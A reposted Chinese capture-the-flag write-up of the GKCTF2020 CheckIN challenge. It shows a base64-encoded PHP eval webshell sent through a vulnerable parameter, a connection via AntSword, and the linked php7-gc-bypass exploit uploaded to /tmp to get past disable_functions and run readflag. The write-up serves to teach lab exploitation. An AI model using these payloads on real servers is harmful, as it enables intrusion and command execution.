标签：多方面 CheckIN base64 GKCTF2020 flag buuoj 7.3 readflag 上传

打开之后是这样的，没有发现反序列化函数，但是发现有一个@eval，想到了一句话，这是用base64进行传参

首先传参phpinfo();看看，需要经过base64编码

http://e0cc90ac-d4bc-450c-a6a4-476298ce7c18.node3.buuoj.cn/?Ginkgo=cGhwaW5mbygpOw==

• 1

找到disable_functions，发现过滤了许多危险函数

我们上传一个一句话木马看看
eval($_POST[123]);，经过base64是ZXZhbCgkX1BPU1RbMTIzXSk7
执行

http://e0cc90ac-d4bc-450c-a6a4-476298ce7c18.node3.buuoj.cn/?Ginkgo=ZXZhbCgkX1BPU1RbMTIzXSk7

• 1

用菜刀，连不上，我呆了，还好有个蚁剑

再试一下，成功了

发现了flag，结果打不开，也修改不了权限

打开readflag看看，有乱码，想到是通过执行readflag来读取flag

然后怎么办，我在不会了。。。
看了大佬的wp后才知道做题要注意版本
通过phpinfo()知道php版本为7.3，这个版本有一个漏洞
php7-gc-bypass漏洞利用PHP garbage collector程序中的堆溢出触发进而执行命令
影响范围是linux，php7.0-7.3
给出了exp
https://github.com/mm0r1/exploits/blob/master/php7-gc-bypass/exploit.php
下载后进行修改，改为执行readflag

然后通过蚁剑进行上传这里发现tmp目录权限是1777，于是决定上传到这个目录

点击此处上传

通过之前的一句话来执行文件包含，得到flag

标签：多方面,CheckIN,base64,GKCTF2020,flag,buuoj,7.3,readflag,上传
来源： https://www.cnblogs.com/huhuf6/p/13740040.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。